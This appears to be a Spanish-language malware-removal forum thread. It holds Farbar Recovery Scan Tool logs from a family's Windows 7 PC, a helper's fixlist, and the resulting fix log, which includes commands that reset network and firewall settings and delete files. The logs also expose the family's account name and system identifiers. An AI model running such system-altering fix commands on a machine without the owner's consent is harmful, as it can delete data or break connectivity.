    2020-04-17 06:31 - 2020-04-17 06:31 - 000000000 _____ C:\Users\Familia Landaeta\AppData\Local\php.zip
    2020-04-16 11:01 - 2020-04-16 15:58 - 000002238 _____ C:\Users\Public\Desktop\League of Legends.lnk
    2020-04-16 10:38 - 2020-04-16 11:08 - 000000000 ____D C:\Users\Familia Landaeta\Desktop\Riot Games
    2020-04-16 10:38 - 2020-04-16 11:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Riot Games
    2020-04-16 10:38 - 2020-04-16 10:38 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Riot Games
    2020-04-16 10:32 - 2020-04-16 19:09 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\Riot Games
    2020-04-16 10:03 - 2020-04-16 10:17 - 068993192 _____ (Riot Games, Inc.) C:\Users\Familia Landaeta\Downloads\Install League of Legends la1.exe

    ==================== Un mes (modificado) ==================

    (Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)

    2020-04-28 12:18 - 2019-02-05 08:51 - 000000000 ___HD C:\Users\Familia Landaeta\AppData\Local\aoxfre
    2020-04-28 11:51 - 2009-07-14 00:34 - 000022528 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2020-04-28 11:51 - 2009-07-14 00:34 - 000022528 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2020-04-28 11:11 - 2009-07-13 22:37 - 000000000 ____D C:\Windows\system32\NDF
    2020-04-28 09:51 - 2009-07-14 00:53 - 000000006 ____H C:\Windows\Tasks\SA.DAT
    2020-04-28 00:38 - 2016-09-12 11:42 - 000004050 _____ C:\Windows\system32\Tasks\User_Feed_Synchronization-{6BA31EE6-0E9C-4B23-991B-FCF4330E17DB}
    2020-04-27 23:35 - 2019-04-20 14:53 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Roaming\vlc
    2020-04-27 19:29 - 2016-09-12 11:46 - 000002168 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    2020-04-27 11:49 - 2018-12-04 09:02 - 000000000 ____D C:\Users\Familia Landaeta\Desktop\Pendrive
    2020-04-26 12:04 - 2018-03-18 20:04 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
    2020-04-26 01:01 - 2009-07-14 00:53 - 000032608 _____ C:\Windows\Tasks\SCHEDLGU.TXT
    2020-04-25 20:23 - 2018-07-09 16:50 - 000109280 _____ C:\Users\Familia Landaeta\AppData\Local\GDIPFONTCACHEV1.DAT
    2020-04-25 20:03 - 2009-07-13 22:37 - 000000000 ____D C:\Windows\inf
    2020-04-25 12:24 - 2018-07-11 10:23 - 000409632 _____ C:\Windows\system32\FNTCACHE.DAT
    2020-04-25 12:23 - 2010-11-20 20:38 - 000000000 ____D C:\Windows\CSC
    2020-04-25 12:01 - 2010-11-20 20:30 - 000734986 _____ C:\Windows\system32\perfh00A.dat
    2020-04-25 12:01 - 2010-11-20 20:30 - 000154386 _____ C:\Windows\system32\perfc00A.dat
    2020-04-25 12:01 - 2010-11-20 17:01 - 001678672 _____ C:\Windows\system32\PerfStringBackup.INI
    2020-04-25 11:55 - 2017-09-25 18:27 - 000000000 ____D C:\Users\Familia Landaeta\Documents\counter strike
    2020-04-25 11:55 - 2017-01-30 12:00 - 000000000 ____D C:\Users\Familia Landaeta\Documents\Ailyn
    2020-04-25 11:55 - 2017-01-30 02:46 - 000000000 ____D C:\Users\Familia Landaeta\Documents\manuales
    2020-04-25 11:55 - 2016-09-16 14:13 - 000000000 ____D C:\Users\Familia Landaeta\Documents\Gunz
    2020-04-25 11:21 - 2009-07-13 22:37 - 000000000 ____D C:\Windows\tracing
    2020-04-25 08:16 - 2009-07-13 22:04 - 000000035 _____ C:\Windows\system32\Drivers\etc\hosts_bak_908
    2020-04-23 10:37 - 2017-10-06 17:46 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\Adobe
    2020-04-22 12:04 - 2018-02-08 17:11 - 000004464 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task
    2020-04-22 03:08 - 2018-07-11 10:33 - 000000093 _____ C:\Windows\UGGLauncher.INI
    2020-04-21 21:12 - 2016-09-12 11:35 - 000000000 ____D C:\Program Files\Google
    2020-04-21 20:26 - 2016-09-12 11:35 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\Google
    2020-04-21 08:51 - 2018-07-11 10:33 - 000001190 _____ C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Play UGGunz!.lnk
    2020-04-20 13:05 - 2016-10-17 10:44 - 000000000 ____D C:\Users\Familia Landaeta\Desktop\Games
    2020-04-16 11:07 - 2016-09-21 12:10 - 000000000 ____D C:\ProgramData\Riot Games
    2020-04-16 10:20 - 2016-09-12 11:35 - 000003524 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
    2020-04-16 10:20 - 2016-09-12 11:35 - 000003396 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
    2020-04-16 09:23 - 2019-04-13 03:35 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\ElevatedDiagnostics
    2020-04-08 17:01 - 2017-01-22 15:53 - 000000000 ____D C:\Program Files\Counter-Strike 1.6

    ==================== Archivos en la raíz de algunos directorios ========

    2020-04-17 06:31 - 2020-04-17 06:31 - 000000000 _____ () C:\Users\Familia Landaeta\AppData\Local\php.zip

    ==================== SigCheck ============================

    (No existe una corrección automática para los archivos que no pasan la verificación.)


    LastRegBack: 2020-04-27 08:34
    ==================== Final de FRST.txt ========================

Resultados del Análisis Adicional de Farbar Recovery Scan Tool (x86) Versión: 26-04-2020
Ejecutado por Familia Landaeta (28-04-2020 12:35:44)
Ejecutado desde C:\Users\Familia Landaeta\Desktop
Windows 7 Ultimate Service Pack 1 (X86) (2016-09-12 15:27:10)
Modo de Inicio: Normal
==========================================================


==================== Cuentas: =============================

Administrador (S-1-5-21-1692793609-910991690-2205039242-500 - Administrator - Disabled)
Familia Landaeta (S-1-5-21-1692793609-910991690-2205039242-1000 - Administrator - Enabled) => C:\Users\Familia Landaeta
HomeGroupUser$ (S-1-5-21-1692793609-910991690-2205039242-1002 - Limited - Enabled)
Invitado (S-1-5-21-1692793609-910991690-2205039242-501 - Limited - Disabled)

==================== Centro de Seguridad ========================

(Si una entrada es incluida en el fixlist, será eliminada.)


==================== Programas instalados ======================

(Solo los programas de adware con indicador "Oculto", pueden ser añadidos al fixlist para hacerlos visibles. Los programas adware deben ser desinstalados manualmente.)

Adobe Acrobat Reader DC - Español (HKLM\...\{AC76BA86-7AD7-1034-7B44-AC0F074E4100}) (Version: 19.010.20098 - Adobe Systems Incorporated)
Akamai NetSession Interface (HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Akamai) (Version:  - Akamai Technologies, Inc)
CCleaner (HKLM\...\CCleaner) (Version: 5.65 - Piriform)
Cheating-Death 4.33.4 (HKLM\...\Cheating-Death) (Version:  - )
Counter-Strike 1.6 (HKLM\...\Counter-Strike 1.6_is1) (Version: Counter-Strike 1.6 No Steam - KingSOFT DVD)
Epson E-Web Print (HKLM\...\{6BF9F374-EC67-4808-A90C-F127DE6D989D}) (Version: 1.23.0000 - SEIKO EPSON CORPORATION)
EPSON L355 Series Printer Uninstall (HKLM\...\EPSON L355 Series) (Version:  - SEIKO EPSON Corporation)
EPSON Scan (HKLM\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
Epson Software Updater (HKLM\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION)
FIFA 14 versión 1.1 (HKLM\...\{A119D7FE-EF42-497D-A87A-C27F106E883E}_is1) (Version: 1.1 - )
Google Chrome (HKLM\...\Google Chrome) (Version: 81.0.4044.129 - Google LLC)
Google Update Helper (HKLM\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.451 - Google LLC) Hidden
Hero Editor V0.96 (C:\Program Files\Hero Editor\) (HKLM\...\ST6UNST #2) (Version:  - )
Hero Editor V0.96 (HKLM\...\ST6UNST #1) (Version:  - )
Intel® Processor Identification Utility (HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Utilidad Intel® para identificación de procesadores 6.3.0404) (Version: 6.3.0404 - Intel Corporation)
Java 8 Update 181 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F32180181F0}) (Version: 8.0.1810.13 - Oracle Corporation)
League of Legends (HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Riot Game league_of_legends.live) (Version:  - Riot Games, Inc)
Microsoft .NET Framework 4.6.1 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM\...\{402ED4A1-8F5B-387A-8688-997ABF58B8F2}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24212 (HKLM\...\{462f63a8-6347-4894-a1b3-dbfe3a4c981d}) (Version: 14.0.24212.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML4 Parser (HKLM\...\{01501EBA-EC35-4F9F-8889-3BE346E5DA13}) (Version: 1.0.0 - Microsoft Game Studios)
Steam (HKLM\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Utilidad Intel® para identificación de procesadores (HKLM\...\{285B6614-95B6-4F8E-BE81-CFAE1DB22D57}) (Version: 6.3.0404 - Intel Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
WinRAR 4.20 (32-bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
X-Mouse Button Control 2.19 (HKLM\...\X-Mouse Button Control) (Version: 2.19 - Highresolution Enterprises)

==================== Personalizado CLSID (Lista blanca): ==============

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

CustomCLSID: HKU\S-1-5-21-1692793609-910991690-2205039242-1000_Classes\CLSID\{305CA226-D286-468e-B848-2B2E8E697B74}\Shell\Open\Command -> C:\Users\Familia Landaeta\AppData\Local\Akamai\ControlPanel.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
ShellExecuteHooks: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-06-09] (Alexander Roshal) [Archivo no firmado]
ContextMenuHandlers4: [MSSE] -> {0365FE2C-F183-4091-AC82-BFC39FB75C49} =>  -> Ningún archivo
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2010-08-25] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-06-09] (Alexander Roshal) [Archivo no firmado]

==================== Codecs (Lista blanca) ====================

==================== Accesos directos & WMI ========================

==================== Módulos cargados (Lista blanca) =============

2016-09-12 11:32 - 2012-06-09 19:50 - 000167936 _____ (Alexander Roshal) [Archivo no firmado] C:\Program Files\WinRAR\rarext.dll
2016-12-07 14:44 - 2016-12-07 14:44 - 000308736 _____ (IntelleSoft) [Archivo no firmado] C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\BugTrapU.dll
2016-09-21 11:56 - 2016-09-21 11:56 - 000097280 _____ (Microsoft Corporation) [Archivo no firmado] C:\Windows\WinSxS\x86_microsoft.vc80.atl_1fc8b3b9a1e18e3b_8.0.50727.4053_none_d1c738ec43578ea1\ATL80.DLL

==================== Alternate Data Streams (Lista blanca) ========

==================== Modo Seguro (Lista blanca) ==================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El "AlternateShell" será restaurado.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Asociación (Lista blanca) =================

==================== Internet Explorer sitios de confianza/restringidos ==========

(Si una entrada es incluida en el fixlist, será eliminada del registro.)

IE restricted site: HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\xnxx.com -> www.xnxx.com

==================== Hosts contenido: =========================

(Si es necesario, la directiva Hosts: puede ser incluida en el fixlist para restablecer Hosts.)

2009-07-13 22:04 - 2020-04-27 11:30 - 000000885 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1       localhost
0.0.0.0 test.bypclife

==================== Otras Áreas ===========================

(Actualmente no existe una corrección automática para esta sección.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 37.120.145.234 - 8.8.8.8
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall de Windows está habilitado.

==================== MSCONFIG/TASK MANAGER elementos deshabilitados ==

(Si una entrada es incluida en el fixlist, será eliminada.)

MSCONFIG\startupreg: Akamai NetSession Interface => "C:\Users\Familia Landaeta\AppData\Local\Akamai\netsession_win.exe"

==================== Reglas de firewall (Lista blanca) ================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

FirewallRules: [{4C2EA450-FCEB-48E3-8469-496CA762A139}] => (Allow) E:\GameforgeLive\Games\ESP_spa\Elsword\data\x2.exe Ningún archivo
FirewallRules: [{AC0AB0E1-512E-4FA0-AFB0-88FEAB7DBB8A}] => (Allow) E:\GameforgeLive\Games\ESP_spa\Elsword\data\x2.exe Ningún archivo
FirewallRules: [TCP Query User{46EE030B-7A57-4E3F-AB8B-9F0DBB3110AC}C:\program files\counter-strike 1.6\hl.exe] => (Allow) C:\program files\counter-strike 1.6\hl.exe (Valve) [Archivo no firmado]
FirewallRules: [UDP Query User{D653C05C-F715-45BF-BE04-7DF15D930FA2}C:\program files\counter-strike 1.6\hl.exe] => (Allow) C:\program files\counter-strike 1.6\hl.exe (Valve) [Archivo no firmado]
FirewallRules: [{FBBEBCD5-A2F7-4A06-B4E0-1CC8755C1FE8}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{09013516-0F08-4C86-89EC-792743B3C402}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [UDP Query User{C5723237-617D-487F-AA6B-1051735D0E52}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [TCP Query User{EB69B0BF-CEBA-4A76-A71B-5B54873F6315}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [UDP Query User{F36ED7B7-BE13-4F27-B4D4-7AC9C3F80504}C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\familia landaeta\appdata\local\akamai\netsession_win.exe (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
FirewallRules: [{E27126AC-A01E-4EA3-B035-9736657180B7}] => (Allow) C:\AeriaGames\Aura Kingdom-ES\game.bin (X-Legend Entertainment CO., LTD. -> X-LEGEND Entertaimment)
FirewallRules: [{7AB9F7C9-0BAF-45D6-9BE3-0CBC5A30A82D}] => (Allow) C:\AeriaGames\Aura Kingdom-ES\game.bin (X-Legend Entertainment CO., LTD. -> X-LEGEND Entertaimment)
FirewallRules: [TCP Query User{25A2BA8A-28C5-4E9B-A6EC-0E14FA44696A}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [UDP Query User{FC10D8A2-84A6-486E-9B44-4D429630E79C}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [TCP Query User{EC824BA9-E1C5-4845-9D9F-CEAAC0D6906D}C:\program files\universegamers\gunzv10.1\uggunz.exe] => (Allow) C:\program files\universegamers\gunzv10.1\uggunz.exe (Universe Gamers) [Archivo no firmado]
FirewallRules: [UDP Query User{FBFA65E9-D662-4EA6-94C8-5B65E28D736F}C:\program files\universegamers\gunzv10.1\uggunz.exe] => (Allow) C:\program files\universegamers\gunzv10.1\uggunz.exe (Universe Gamers) [Archivo no firmado]
FirewallRules: [TCP Query User{B3269DA9-6177-4678-B55E-C9B931C1229C}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [UDP Query User{2FFF9BF0-13C8-42B3-A231-6751376620F7}C:\users\familia landaeta\documents\counter-strike source\hl2.exe] => (Allow) C:\users\familia landaeta\documents\counter-strike source\hl2.exe () [Archivo no firmado]
FirewallRules: [{2C916BF5-DB28-4C44-8AFD-D827448F82BB}] => (Allow) C:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{7DE87355-A05F-410A-8AAE-AD72211BAAE8}] => (Allow) C:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{1F09387B-EAC1-494C-9728-5D3C7724F953}] => (Allow) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{DC393E86-4829-46F1-B277-E2E6F1B3B57D}] => (Allow) C:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{39743059-F121-4032-AE0A-5C62AAD34E8F}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Puntos de Restauración =========================

No se pudieron listar los puntos de restauración
Comprobar el servicio "winmgmt" o reparar WMI.


==================== Dispositivos defectuosos en el Administrador de dispositivos ============


==================== Errores del registro de eventos: ========================

Errores de aplicación:
==================
Error: (04/28/2020 09:51:48 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Error de activación de la licencia de Windows. Error 0x00000000.

Error: (04/28/2020 09:51:48 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Error de la activación de licencia (slui.exe) con el siguiente código:
0x800401F9

Error: (04/27/2020 12:02:23 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Error de activación de la licencia de Windows. Error 0x00000000.

Error: (04/27/2020 12:02:23 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Error de la activación de licencia (slui.exe) con el siguiente código:
0x800401F9

Error: (04/27/2020 11:45:54 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Error de activación de la licencia de Windows. Error 0x00000000.

Error: (04/27/2020 11:45:54 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: Error de la activación de licencia (slui.exe) con el siguiente código:
0x800401F9

Error: (04/27/2020 11:29:47 AM) (Source: VSS) (EventID: 8194) (User: )
Description: Error del Servicio de instantáneas de volumen: error inesperado al consultar la interfaz IVssWriterCallback. HR = 0x80070005, Acceso denegado.
.
A menudo ocurre por una configuración de seguridad incorrecta en el proceso de escritura o de solicitud.


Operación:
   Recopilando datos del escritor

Contexto:
   Id. de clase del escritor: {e8132975-6f93-4464-a53e-1050253ae220}
   Nombre del escritor: System Writer
   Id. de instancia del escritor: {27343c29-13b3-48b1-92d6-ae3d859bcda2}

Error: (04/27/2020 08:09:01 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Error de activación de la licencia de Windows. Error 0x00000000.


Errores del sistema:
=============
Error: (04/28/2020 09:52:27 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: Error de DCOM "1083" al intentar iniciar el servicio winmgmt con argumentos "" para ejecutar el servidor:
{8BC3F05E-D86B-11D0-A075-00C04FB68820}

Error: (04/28/2020 09:52:21 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: Error de DCOM "1083" al intentar iniciar el servicio winmgmt con argumentos "" para ejecutar el servidor:
{8BC3F05E-D86B-11D0-A075-00C04FB68820}

Error: (04/28/2020 09:52:19 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: Error de DCOM "1083" al intentar iniciar el servicio winmgmt con argumentos "" para ejecutar el servidor:
{8BC3F05E-D86B-11D0-A075-00C04FB68820}

Error: (04/28/2020 09:52:15 AM) (Source: WMPNetworkSvc) (EventID: 14332) (User: )
Description: El servicio "WMPNetworkSvc" no se puede iniciar correctamente debido al error "0x80004005" en CoCreateInstance(CLSID_UPnPDeviceFinder). Compruebe que el servicio UPnPHost esté en ejecución y que el componente UPnPHost de Windows esté instalado correctamente.

Error: (04/28/2020 09:51:52 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Aplicación auxiliar IP depende del servicio Windows Management Instrumentation, el cual no pudo iniciarse debido al siguiente error: 
Este servicio se configuró para ejecutarse en un programa ejecutable, pero el programa no implementa el servicio.

Error: (04/28/2020 09:51:51 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio Centro de seguridad depende del servicio Windows Management Instrumentation, el cual no pudo iniciarse debido al siguiente error: 
Este servicio se configuró para ejecutarse en un programa ejecutable, pero el programa no implementa el servicio.

Error: (04/27/2020 12:42:21 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: El servicio MBAMService depende del servicio Windows Management Instrumentation, el cual no pudo iniciarse debido al siguiente error: 
Este servicio se configuró para ejecutarse en un programa ejecutable, pero el programa no implementa el servicio.

Error: (04/27/2020 12:27:41 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: No se pudo registrar el nombre "WORKGROUP      :1d" en la interfaz con dirección IP 192.168.1.2.
El equipo la con dirección IP 192.168.1.6 no admite el nombre reclamado por este equipo.


Windows Defender:
===================================
Date: 2020-04-16 10:04:25.437
Description: 
El examen de Windows Defender se detuvo antes de completarse.
Id. de examen:{D89403F0-B93D-475E-9BE2-D2E52245BCDF}
Tipo de examen:AntiSpyware
Parámetros de examen:Examen rápido
Usuario:FamiliaLandaeta\Familia Landaeta

==================== Información de la memoria =========================== 

BIOS: American Megatrends Inc. 6.07 03/21/2011
Placa base: FOXCONN 2A8C
Procesador: Pentium(R) Dual-Core CPU E5800 @ 3.20GHz
Porcentaje de memoria en uso: 88%
RAM física total: 2013.24 MB
RAM física disponible: 238.58 MB
Virtual total: 4026.48 MB
Virtual disponible: 1112.68 MB

==================== Unidades ================================

Drive c: () (Fixed) (Total:148.95 GB) (Free:51.41 GB) NTFS

\\?\Volume{459fd2d9-792a-11e6-a962-806e6f6e6963}\ (Reservado para el sistema) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS

==================== MBR & Tabla de particiones ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 149.1 GB) (Disk ID: F362F362)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=149 GB) - (Type=07 NTFS)

==================== Final  Addition.txt =======================

Ejecuta de nuevo la herramienta de limpieza de Malwarebytes y luego,

En el equipo con los demas programas cerrados:

Inicio >>> Ejecutar >>>Escribes notepad.exe.

Ahora copia y pega estos archivos dentro del Notepad:


Start
CreateRestorePoint:
CloseProcesses:

2020-04-27 10:57 - 2020-04-27 10:57 - 000166848 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2020-04-26 20:38 - 2020-04-27 11:03 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-04-25 20:58 - 2020-04-27 12:41 - 000129056 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae.sys
2020-04-25 20:26 - 2020-04-25 20:32 - 000000000 ____D C:\ProgramData\MB2Migration
2020-04-22 12:58 - 2020-04-22 12:58 - 000000000 ____D C:\Program Files\Malwarebytes
2020-04-27 11:03 - 2020-04-27 11:03 - 000222648 _____ (Malwarebytes) C:\Windows\system32\Drivers\7372779E.sys


HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
END

Lo guardas bajo el nombre de fixlist.txt en el escritorio <<< Esto es muy importante.<<

Nota: Es importante que la Hta Frst.exe y fixlist.txt se encuentren en la misma ubicación (escritorio) o si no no trabajara.

  • Ejecutas Frst.exe.

  • Presionas el botón Corregir y aguardas a que termine.

  • La Herramienta guardara el reporte en tu escritorio (Fixlog.txt).

Lo pegas en tu próxima respuesta, comentado como va el problema

Pra ello vuelve a tratar de instalar Malwarebytes de la siguiente manera:

Descarga en el escritorio esta herramienta…boton derecho -ejecutar como administrador

https://downloads.malwarebytes.com/file/mbst?scr=Forums-Home-Support

Pestaña Advanced - y elijes “clean”…sigues las indicaciones y cuando te pregunte.,dale a reinstalar Malwarebtrtes ( es posible que te pida reiniciar antes y luego siga con el proceso al reinciar)

Comentas

Resultados de la corrección de Farbar Recovery Scan Tool (x86) Versión: 28-04-2020
Ejecutado por Familia Landaeta (29-04-2020 11:30:45) Run:2
Ejecutado desde C:\Users\Familia Landaeta\Desktop
Perfiles cargados: Familia Landaeta (Perfiles disponibles: Familia Landaeta)
Modo de Inicio: Normal

==============================================

fixlist contenido:
*****************
Start
CreateRestorePoint:
CloseProcesses:

2020-04-27 10:57 - 2020-04-27 10:57 - 000166848 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2020-04-26 20:38 - 2020-04-27 11:03 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-04-25 20:58 - 2020-04-27 12:41 - 000129056 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae.sys
2020-04-25 20:26 - 2020-04-25 20:32 - 000000000 ____D C:\ProgramData\MB2Migration
2020-04-22 12:58 - 2020-04-22 12:58 - 000000000 ____D C:\Program Files\Malwarebytes
2020-04-27 11:03 - 2020-04-27 11:03 - 000222648 _____ (Malwarebytes) C:\Windows\system32\Drivers\7372779E.sys


HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
END
*****************

El punto de restauración fue creado correctamente.
Procesos cerrados correctamente.
"C:\Windows\system32\Drivers\mbamchameleon.sys" => no encontrado
"C:\ProgramData\Malwarebytes" => no encontrado
C:\Windows\system32\Drivers\mbae.sys => movido correctamente
C:\ProgramData\MB2Migration => movido correctamente
C:\Program Files\Malwarebytes => movido correctamente
C:\Windows\system32\Drivers\7372779E.sys => movido correctamente
C:\Windows\System32\Drivers\etc\hosts => movido correctamente
Hosts restaurado correctamente.

========= RemoveProxy: =========

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => eliminado correctamente
HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer => eliminado correctamente
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\SOFTWARE\Policies\Microsoft\Internet Explorer => eliminado correctamente
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => eliminado correctamente
